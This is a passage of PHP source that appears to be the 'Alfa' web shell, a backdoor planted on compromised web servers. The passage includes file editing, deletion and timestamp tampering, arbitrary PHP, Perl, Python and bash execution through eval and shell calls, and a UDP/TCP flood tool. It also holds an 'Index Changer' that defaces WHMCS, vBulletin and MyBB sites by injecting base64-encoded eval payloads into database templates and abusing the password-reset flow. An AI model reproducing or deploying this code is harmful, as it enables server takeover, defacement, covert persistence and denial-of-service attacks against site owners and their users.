            echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\'' . addslashes(!isset($rename_cache) ? $_POST['alfa1'] : $rename_cache) . '\',\'' . strtolower($v) . '\',\'\',\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\'):\'\';"><span class="editor_actions">' . (strtolower($v) == @$_POST['alfa2'] ? '<b><span class="editor_actions"> ' . $v . ' </span> </b>' : $v) . ' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\'' . addslashes(!isset($rename_cache) ? $_POST['alfa1'] : $rename_cache) . '\',\'' . strtolower($v) . '\',\'\',\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\')"><span class="editor_actions">' . (strtolower($v) == @$_POST['alfa2'] ? '<b><span class="editor_actions"> ' . $v . ' </span> </b>' : $v) . ' | </span></a>';
        }
        echo "</div>";
        switch ($_POST['alfa2']) {
            case 'view':
            case 'edit':
                @chdir($_POST['c']);
                $disabled_btn = "";
                if (!@is_writable($_POST['alfa1']) && !_alfa_is_writable($_POST['alfa1'])) {
                    $disabled_btn = "disabled=disabled";
                    $disabled_btn_style = 'background: #ff0000;color: #fff;';
                }
                if (!empty($_POST['alfa3'])) {
                    $_POST['alfa3'] = substr($_POST['alfa3'], 1);
                    $time = @filemtime($_POST['alfa1']);
                    $fp = @__write_file($_POST['alfa1'], $_POST['alfa3']);
                    if ($chdir_fals && $alfa_canruncmd) {
                        $rname = $alfa1_decoded;
                        $randname = $rname . rand(111, 9999);
                        $filepath = dirname($_SERVER["SCRIPT_FILENAME"]) . "/" . $randname;
                        if ($fp = @__write_file($filepath, $_POST['alfa3'])) {
                            alfaEx("mv '" . addslashes($filepath) . "' '" . addslashes($_POST["alfa1"]) . "';rm -f '" . addslashes($filepath) . "'");
                        }
                    }
                    if ($fp) {
                        echo "Saved!<br>";
                        @touch($_POST['alfa1'], $time, $time);
                    }
                }
                echo '<div class="editor-view"><div class="view-content editor-ace-controller"><div style="display:inline-block;">' . _alfa_load_ace_options("editor") . '<button style="border-radius:10px;" class="button ace-controler" onClick="copyToClipboard(this);">Copy</button> <button class="button ace-controler" onclick="alfaAceToFullscreen(this);">Full Screen</button> <button onclick="var ace_val = alfa_ace_editors.editor[this.getAttribute(\'ace_id\')].getValue();editor(\'' . addslashes($alfa1_decoded) . '\',\'edit\',\'1\'+ace_val,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;" class="button ace-controler ace-save-btn" style="width: 100px;height: 33px;' . $disabled_btn_style . '" ' . $disabled_btn . '>save</button></div><pre class="ml1 view_ml_content">';
                echo htmlspecialchars(__read_file($_POST['alfa1']));
                echo "</pre></div></div>";
                break;
            case 'highlight':
                @chdir($_POST['c']);
                if (@is_readable($_POST['alfa1'])) {
                    echo "<div class=\"editor-view\"><div class=\"view-content\"><div class=\"ml1\" style=\"background-color: #e1e1e1;color:black;\">";
                    $code = @highlight_file($_POST['alfa1'], true);
                    echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div></div></div>';
                }
                break;
            case 'delete':
                @chdir($_POST['c']);
                if (@is_writable($_POST['alfa1']) || $GLOBALS["glob_chdir_false"]) {
                    $deleted = true;
                    if (!@unlink($_POST['alfa1'])) {
                        $deleted = false;
                        if ($alfa_canruncmd) {
                            if (_alfa_is_writable($_POST['alfa1'])) {
                                alfaEx("rm -f '" . addslashes($_POST['alfa1']) . "'");
                                $deleted = true;
                            }
                        }
                    }
                    if ($deleted) {
                        echo 'File Deleted...<script>var elem = $("' . $_POST['alfa4'] . '").parentNode;elem.parentNode.removeChild(elem);delete editor_files["' . $_POST['alfa4'] . '"];</script>';
                    } else {
                        echo "Error...";
                    }
                }
                break;
            case 'chmod':
                @chdir($_POST['c']);
                if (!empty($_POST['alfa3'])) {
                    $perms = 0;
                    for ($i = strlen($_POST['alfa3']) - 1; $i >= 0; --$i) {
                        $perms += (int) $_POST['alfa3'][$i] * pow(8, strlen($_POST['alfa3']) - $i - 1);
                    }
                    if (!@chmod($_POST['alfa1'], $perms)) {
                        if ($chdir_fals && $alfa_canruncmd) {
                            alfaEx("cd '" . addslashes($_POST["c"]) . "';chmod " . addslashes($_POST['alfa3']) . " '" . addslashes($alfa1_decoded) . "'");
                            echo "Success!";
                        } else {
                            echo "<font color=\"#FFFFFF\"><b>Can't set permissions!</b></font><br><script>document.mf.alfa3.value=\"\";</script>";
                        }
                    } else {
                        echo "Success!";
                    }
                }
                clearstatcache();
                AlfaNum(8, 9, 10, 7, 6, 5, 4, 2, 1);
                if ($chdir_fals) {
                    $file_perm = $file_info[5];
                } else {
                    $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])), -4);
                }
                echo '<script>alfa3_="";</script><form onsubmit="editor(\'' . addslashes($_POST['alfa1']) . '\',\'' . $_POST['alfa2'] . '\',this.chmod.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type="text" name="chmod" value="' . $file_perm . '"><input type=submit value=" "></form>';
                break;
            case 'hexdump':
                @chdir($_POST['c']);
                $c = __read_file($_POST['alfa1']);
                $n = 0;
                $h = array('00000000<br>', '', '');
                $len = strlen($c);
                for ($i = 0; $i < $len; ++$i) {
                    $h[1] .= sprintf('%02X', ord($c[$i])) . ' ';
                    switch (ord($c[$i])) {
                        case 0:
                            $h[2] .= ' ';
                            break;
                        case 9:
                            $h[2] .= ' ';
                            break;
                        case 10:
                            $h[2] .= ' ';
                            break;
                        case 13:
                            $h[2] .= ' ';
                            break;
                        default:
                            $h[2] .= $c[$i];
                            break;
                    }
                    $n++;
                    if ($n == 32) {
                        $n = 0;
                        if ($i + 1 < $len) {
                            $h[0] .= sprintf('%08X', $i + 1) . '<br>';
                        }
                        $h[1] .= '<br>';
                        $h[2] .= "\n";
                    }
                }
                echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table></div></div>';
                break;
            case 'rename':
                @chdir($_POST['c']);
                $alfa1_escape = addslashes($_POST["alfa1"]);
                $alfa3_escape = addslashes($_POST["alfa3"]);
                if (!empty($_POST['alfa3'])) {
                    $cmd_rename = false;
                    if ($chdir_fals && $alfa_canruncmd) {
                        if (_alfa_is_writable($_POST['alfa1'])) {
                            $alfa1_escape = addslashes($alfa1_decoded);
                            alfaEx("cd '" . addslashes($_POST['c']) . "';mv '" . $alfa1_escape . "' '" . addslashes($_POST['alfa3']) . "'");
                        } else {
                            $cmd_rename = true;
                        }
                    } else {
                        $alfa1_escape = addslashes($_POST["alfa1"]);
                    }
                    if (!@rename($_POST['alfa1'], $_POST['alfa3']) && $cmd_rename) {
                        echo "Can't rename!<br>";
                    } else {
                        echo 'Renamed!<script>try{$("' . $_POST['alfa4'] . '").innerHTML = "<div class=\'editor-icon\'>"+loadType(\'' . $alfa3_escape . '\',\'' . $ftype . '\',\'' . $_POST['alfa4'] . '\')+"</div><div class=\'editor-file-name\'>' . $alfa3_escape . '</div>";editor_files["' . $_POST['alfa4'] . '"].file = "' . $alfa3_escape . '";updateFileEditor("' . $alfa1_escape . '", "' . $alfa3_escape . '");' . ($ftype == "dir" ? "updateDirsEditor('" . $_POST['alfa4'] . "','" . $alfa1_escape . "');" : "") . '}catch(e){console.log(e)}</script>';
                        $alfa1_escape = $alfa3_escape;
                    }
                }
                echo '<form onsubmit="editor(\'' . $alfa1_escape . '\',\'' . $_POST['alfa2'] . '\',this.name.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type="text" name="name" value="' . addslashes(htmlspecialchars(isset($_POST['alfa3']) && $_POST['alfa3'] != '' ? $_POST['alfa3'] : $alfa1_decoded)) . '"><input type=submit value=" "></form>';
                break;
            case 'touch':
                @chdir($_POST['c']);
                if (!empty($_POST['alfa3'])) {
                    $time = strtotime($_POST['alfa3']);
                    if ($time) {
                        $touched = false;
                        if ($chdir_fals && $alfa_canruncmd) {
                            alfaEx("cd '" . addslashes($_POST["c"]) . "';touch -d '" . htmlspecialchars(addslashes($_POST['alfa3'])) . "' '" . addslashes($alfa1_decoded) . "'");
                            $touched = true;
                        }
                        if (!@touch($_POST['alfa1'], $time, $time) && !$touched) {
                            echo "Fail!";
                        } else {
                            echo "Touched!";
                        }
                    } else {
                        echo "Bad time format!";
                    }
                }
                clearstatcache();
                echo '<script>alfa3_="";</script><form onsubmit="editor(\'' . addslashes($_POST['alfa1']) . '\',\'' . $_POST['alfa2'] . '\',this.touch.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", $chdir_fals ? $file_info[4] : @filemtime($_POST['alfa1'])) . '"><input type=submit value=" "></form>';
                break;
            case 'image':
                @chdir($_POST['c']);
                echo "<hr>";
                $file = $_POST['alfa1'];
                $image_info = @getimagesize($file);
                if (is_array($image_info) || $chdir_fals) {
                    $width = (int) $image_info[0];
                    $height = (int) $image_info[1];
                    if ($chdir_fals && $alfa_canruncmd) {
                        $source = alfaEx("cat '" . addslashes($file) . "' | base64");
                        list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '" . addslashes($file) . "'"));
                        $mime = explode(":", alfaEx("file --mime-type '" . addslashes($file) . "'"));
                        $image_info['mime'] = $mime[1];
                    } else {
                        $source = __ZW5jb2Rlcg(__read_file($file, false));
                    }
                    $image_info_h = "Image type = <span>[</span> " . $image_info['mime'] . " <span>]</span><br>Image Size = <span>[ </span>" . $width . " x " . $height . "<span> ]</span><br>";
                    if ($width > 800) {
                        $width = 800;
                    }
                    echo $content = "<div class='editor-view'><div class='view-content'><center>" . $image_info_h . "<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:" . $image_info['mime'] . ";base64," . $source . "' alt='" . $file . "'></center></div></div><br>";
                }
                break;
        }
        echo "</div>";
        alfaFooter();
    }
    function findicon($file, $type)
    {
        $s = 'http://solevisible.com/icons/';
        $types = array('json', 'ppt', 'pptx', 'xls', 'xlsx', 'msi', 'config', 'cgi', 'pm', 'c', 'cpp', 'cs', 'java', 'aspx', 'asp', 'db', 'ttf', 'eot', 'woff', 'woff2', 'woff', 'conf', 'log', 'apk', 'cab', 'bz2', 'tgz', 'dmg', 'izo', 'jar', '7z', 'iso', 'rar', 'bat', 'sh', 'alfa', 'gz', 'tar', 'php', 'php4', 'php5', 'phtml', 'html', 'xhtml', 'shtml', 'htm', 'zip', 'png', 'jpg', 'jpeg', 'gif', 'bmp', 'ico', 'txt', 'js', 'rb', 'py', 'xml', 'css', 'sql', 'htaccess', 'pl', 'ini', 'dll', 'exe', 'mp3', 'mp4', 'm4a', 'mov', 'flv', 'swf', 'mkv', 'avi', 'wmv', 'mpg', 'mpeg', 'dat', 'pdf', '3gp', 'doc', 'docx', 'docm');
        if ($type != 'file') {
            return $file == '..' ? "http://solevisible.com/icons/back.png" : "http://solevisible.com/icons/folder.png";
        } else {
            $ext = explode('.', $file);
            $ext = end($ext);
            $ext = strtolower($ext);
            return in_array($ext, $types) ? $s . $ext . '.png' : "http://solevisible.com/icons/notfound.png";
        }
    }
    function alfadlfile()
    {
        if (isset($_POST['c'], $_POST['file'])) {
            $basename = rawurldecode(basename($_POST['file']));
            $_POST['file'] = str_replace("//", "/", $_POST['c'] . '/' . $basename);
            $alfa_canruncmd = _alfa_can_runCommand(true, true);
            if (@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd) {
                ob_start("ob_gzhandler", 4096);
                header("Content-Disposition: attachment; filename=\"" . addslashes($basename) . "\"");
                header("Content-Type: application/octet-stream");
                if ($GLOBALS["glob_chdir_false"]) {
                    $randname = $basename . rand(111, 9999);
                    $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
                    $filepath = $scriptpath . "/" . $randname;
                    if (_alfa_is_writable($scriptpath)) {
                        alfaEx("cp '" . addslashes($_POST["file"]) . "' '" . addslashes($filepath) . "'");
                        readfile($filepath);
                        @unlink($filepath);
                    } else {
                        alfaEx("cat '" . addslashes($_POST["file"]) . "'");
                    }
                } else {
                    readfile($_POST['file']);
                }
            } else {
                echo "Error...!";
            }
        }
    }
    function __alfa_set_cookie($key, $value)
    {
        $_COOKIE[$key] = $value;
        @setcookie($key, $value, time() + 604800, '/');
    }
    function alfaphpeval()
    {
        if (isset($_COOKIE["eval_tmpdir"]) && @is_dir($_COOKIE["eval_tmpdir"])) {
            $tempdir = __ZGVjb2Rlcg($_COOKIE["eval_tmpdir"]);
        } else {
            $tempdir = dirname(alfaEx("mktemp"));
            __alfa_set_cookie("eval_tmpdir", __ZW5jb2Rlcg($tempdir));
        }
        alfahead();
        if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'ini') {
            echo "<div class=header>";
            ob_start();
            $INI = ini_get_all();
            print "<table border=0><tr><td class=\"listing\"><font class=\"highlight_txt\">Param</td><td class=\"listing\"><font class=\"highlight_txt\">Global value</td><td class=\"listing\"><font class=\"highlight_txt\">Local Value</td><td class=\"listing\"><font class=\"highlight_txt\">Access</td></tr>";
            foreach ($INI as $param => $values) {
                print "\n<tr><td class=\"listing\"><b>" . $param . '</td>' . '<td class="listing">' . $values['global_value'] . ' </td>' . '<td class="listing">' . $values['local_value'] . ' </td>' . '<td class="listing">' . $values['access'] . ' </td></tr>';
            }
            $tmp = ob_get_clean();
            $tmp = preg_replace('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
            $tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
            echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
        }
        if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'info') {
            echo "<div class=header><style>.p {color:#000;}</style>";
            ob_start();
            phpinfo();
            $tmp = ob_get_clean();
            $tmp = preg_replace('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
            $tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
            echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
        }
        if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'exten') {
            echo "<div class=header>";
            ob_start();
            $EXT = get_loaded_extensions();
            echo '<table border=0><tr><td class="listing">' . implode("</td></tr>\n<tr><td class=\"listing\">", $EXT) . '</td></tr></table>' . count($EXT) . ' extensions loaded';
            echo "</div><br>";
        }
        $lang_html = "";
        foreach (array("php" => "php ~> [ Windows / Linux ]", "perl" => "perl ~> [ Linux ]", "python" => "python ~> [ Linux ]", "bash" => "bash ~> [ Linux ]") as $key => $val) {
            $lang_html .= '<option value="' . $key . '" ' . ($_POST["alfa3"] == $key ? "selected" : "") . '>' . $val . '</option>';
        }
        echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form class="php-evals" name="pf" method="post" onsubmit="var ace_value=geEvalAceValue(this);g(\'phpeval\',null,ace_value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">' . $lang_html . '</select>' . _alfa_load_ace_options("eval") . '<br><br><div class="bigarea" style="position:relative;"><div class="php-evals-ace">' . (!empty($_POST['alfa1']) ? htmlspecialchars($_POST['alfa1']) : "&lt;?php\n\n\techo('hello alfa !');\n\n?>") . '</div></div><center><input type="submit" value="" style="margin-top:5px"></center>';
        echo '</form><pre id="PhpOutput" style="' . (empty($_POST['alfa1']) ? 'display:none;' : '') . 'margin-top:5px;" class="ml1">';
        if (!empty($_POST['alfa1'])) {
            if ($_POST['alfa3'] == "php") {
                ob_start();
                eval('?>' . $_POST['alfa1']);
                $result = htmlspecialchars(ob_get_clean());
            } elseif (_alfa_can_runCommand() && $GLOBALS["sys"] == "unix") {
                $lang = $_POST['alfa3'];
                $filename = "temp" . rand(11111, 99999);
                $temp = $tempdir . "/" . $filename;
                __write_file($filename, $_POST['alfa1']);
                $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
                @unlink($filename);
                @unlink($temp);
            }
            echo '<textarea class="bigarea">' . $result . '</textarea>';
        }
        echo "</pre></div>";
        alfafooter();
    }
    function alfahash()
    {
        if (!function_exists('hex2bin')) {
            function hex2bin($p)
            {
                return decbin(hexdec($p));
            }
        }
        if (!function_exists('full_urlencode')) {
            function full_urlencode($p)
            {
                $r = '';
                for ($i = 0; $i < strlen($p); ++$i) {
                    $r .= '%' . dechex(ord($p[$i]));
                }
                return strtoupper($r);
            }
        }
        $stringTools = array('Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)', 'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)', 'strrev ( $string )' => 'strrev($s)', 'bin2hex ( $string )' => 'bin2hex($s)', 'hex2bin ( $string )' => 'hex2bin($s)', 'md5 ( $string )' => 'md5($s)', 'sha1 ( $string )' => 'sha1($s)', 'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)', 'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)', 'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)', 'crypt ( $string )' => 'crypt($s)', 'crc32 ( $string )' => 'crc32($s)', 'str_rot13 ( $string )' => 'str_rot13($s)', 'urlencode ( $string )' => 'urlencode($s)', 'urldecode  ( $string )' => 'urldecode($s)', 'full_urlencode  ( $string )' => 'full_urlencode($s)', 'htmlspecialchars  ( $string )' => 'htmlspecialchars($s)', 'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))', 'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))', 'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))', 'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))', 'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))', 'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))');
        alfahead();
        echo "<div class=header>";
        echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
        foreach ($stringTools as $k => $v) {
            echo "<option value='" . htmlspecialchars($v) . "' " . ($_POST['alfa1'] == $v ? 'selected' : '') . ">" . $k . "</option>";
        }
        echo "</select> <input type='submit' value=' '/><br><textarea  name='input' style='margin-top:5px' class='bigarea'>" . (empty($_POST['alfa1']) ? '' : htmlspecialchars(@$_POST['alfa2'])) . "</textarea></form>";
        if (!empty($_POST['alfa1'])) {
            $string = addslashes($_POST['alfa2']);
            $string = str_replace('\\"', '"', $string);
            $alg = $_POST['alfa1'];
            $code = str_replace('$s', "'" . $string . "'", $alg);
            ob_start();
            eval('echo ' . $code . ';');
            $res = ob_get_contents();
            ob_end_clean();
            if (in_array($alg, $stringTools)) {
                echo '<textarea class="bigarea">' . htmlspecialchars($res) . '</textarea>';
            }
        }
        echo "</div>";
        alfaFooter();
    }
    function alfados()
    {
        alfahead();
        echo "<div class=header>";
        echo "<center><p><div class=\"txtfont_header\">| DOS |</div></p><form onSubmit=\"g('dos',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;\"><div class=\"txtfont\">Method : <select name=\"m\" style=\"width:80px;\"><option value=\"udp\">UDP</option><option value=\"tcp\">TCP</option></select> Host : <input name=\"host\" type=\"text\" value=\"localhost\" size=\"25\" /> Time : <input name=\"time\" type=\"text\" size=\"15\" /> Port : <input name=\"port\" type=\"text\" size=\"10\" /> <input type=\"submit\" value=\" \" /></div></form></center><br>";
        if (!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])) {
            echo __pre();
            $packets = 0;
            ignore_user_abort(true);
            $exec_time = (int) $_POST['alfa2'];
            $time = time();
            $max_time = $exec_time + $time;
            $host = $_POST['alfa1'];
            $port = (int) $_POST['alfa3'];
            $method = $_POST['alfa4'];
            $out = str_repeat('X', 65000);
            while (1) {
                $packets++;
                if (time() > $max_time) {
                    break;
                }
                $fp = @fsockopen($method . '://' . $host, $port, $errno, $errstr, 5);
                if ($fp) {
                    fwrite($fp, $out);
                    fclose($fp);
                }
            }
            echo "<center>{$packets} (" . @round($packets * 65 / 1024, 2) . " MB) packets averaging " . @round($packets / $exec_time, 2) . " packets per second</center>";
            echo "</pre>";
        }
        echo "</div>";
        alfafooter();
    }
    function __pre()
    {
        return "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\">";
    }
    function alfaIndexChanger()
    {
        alfahead();
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick=\"g('IndexChanger',null,null,null,'whmcs')\">| Whmcs | </a><a href=javascript:void(0) onclick=\"g('IndexChanger',null,'vb',null)\">| vBulletin | </a><a href=javascript:void(0) onclick=\"g('IndexChanger',null,null,'mybb')\">| MyBB | </a></h3></center>";
        if (isset($_POST['alfa3']) && $_POST['alfa3'] == 'whmcs') {
            echo __pre();
            echo "<center><center><div class='txtfont_header'>| Whmcs |</div>\r\n<p><center>" . getConfigHtml('whmcs') . "<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">\r\n";
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'));
            create_table($table);
            echo "<br><div class='txtfont'>| Your Index |</div><br>\r\n<textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>\r\n<input type='submit' value=' '>\r\n</form></center></center>";
            if (isset($_POST['alfa6'])) {
                $s0levisible = "Powered By Solevisible";
                $dbu = $_POST['alfa6'];
                $path = $_POST['alfa5'];
                $fname = $_POST['alfa4'];
                $dbn = $_POST['alfa7'];
                $dbp = $_POST['alfa8'];
                $dbh = $_POST['alfa9'];
                $index = $_POST['alfa10'];
                $index = str_replace("\\'", "'", $index);
                $deface = '$x = base64_decode("' . __ZW5jb2Rlcg($index) . '"); $solevisible = fopen("' . $fname . '","w"); fwrite($solevisible,$x);';
                $saveData = __ZW5jb2Rlcg($deface);
                $Def = '{php}eval(base64_decode("' . $saveData . '"));{/php}';
                if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) {
                    $conn = @mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
                    $soleSave = @mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'");
                    $soleGet = mysqli_fetch_assoc($soleSave);
                    $tempSave1 = $soleGet['message'];
                    $tempSave = str_replace("'", "\\'", $tempSave1);
                    $inject = "UPDATE tblemailtemplates SET message='{$Def}' WHERE name='Password Reset Validation'";
                    $result = @mysqli_query($conn, $inject) or die(mysqli_error($conn));
                    $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
                    $result2 = @mysqli_query($conn, $create) or die(mysqli_error($conn));
                    if (function_exists('curl_version')) {
                        $AlfaSole = new AlfaCURL(true);
                        $saveurl = $AlfaSole->Send($path . "/pwreset.php");
                        $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i", $saveurl, $token);
                        $AlfaSole->Send($path . "/pwreset.php", "post", "token={$token[1]}&action=reset&email=solevisible@fbi.gov");
                        $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
                        $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn));
                        __alert('File Created...');
                        echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='" . $path . "/" . $fname . "'>Click Here !</a></font></b></center><br><br>";
                    } else {
                        echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" " . $path . "/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" " . $path . "/" . $fname . " \"</font></b></center><br><br>";
                    }
                }
            }
        }
        if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'vb') {
            echo __pre();
            echo "<center><center><div class='txtfont_header'>| vBulletin |</div>\r\n<p><center>" . getConfigHtml('vb') . "<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">\r\n";
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50'));
            create_table($table);
            echo "<br><div class='txtfont'>| Your Index |</div><br>\r\n<textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>\r\n<input type='submit' value=' '></form></center></center>";
            if ($_POST['alfa8'] == '>>') {
                $s0levisible = "Powered By Solevisible";
                $dbu = $_POST['alfa2'];
                $dbn = $_POST['alfa3'];
                $dbp = $_POST['alfa4'];
                $dbh = $_POST['alfa5'];
                $index = $_POST['alfa6'];
                $prefix = $_POST['alfa7'];
                $index = str_replace("\\'", "'", $index);
                $set_index = "{\${eval(base64_decode(\\'";
                $set_index .= __ZW5jb2Rlcg("echo \"{$index}\";");
                $set_index .= "\\'))}}{\${exit()}}";
                if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) {
                    $conn = @mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
                    $loli1 = "UPDATE " . $prefix . "template SET template='" . $set_index . "" . $s0levisible . "' WHERE title='spacer_open'";
                    $loli2 = "UPDATE " . $prefix . "template SET template='" . $set_index . "" . $s0levisible . "' WHERE title='FORUMHOME'";
                    $loli3 = "UPDATE " . $prefix . "style SET css='" . $set_index . "" . $s0levisible . "', stylevars='', csscolors='', editorstyles=''";
                    @mysqli_query($conn, $loli1) or die(mysqli_error($conn));
                    @mysqli_query($conn, $loli2) or die(mysqli_error($conn));
                    @mysqli_query($conn, $loli3) or die(mysqli_error($conn));
                    __alert('VB index changed...!');
                }
            }
        }
        if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'mybb') {
            echo __pre();
            echo "<center><center><div class='txtfont_header'>| Mybb |</div>\r\n<p><center>" . getConfigHtml('mybb') . "<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>\r\n";
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'));
            create_table($table);
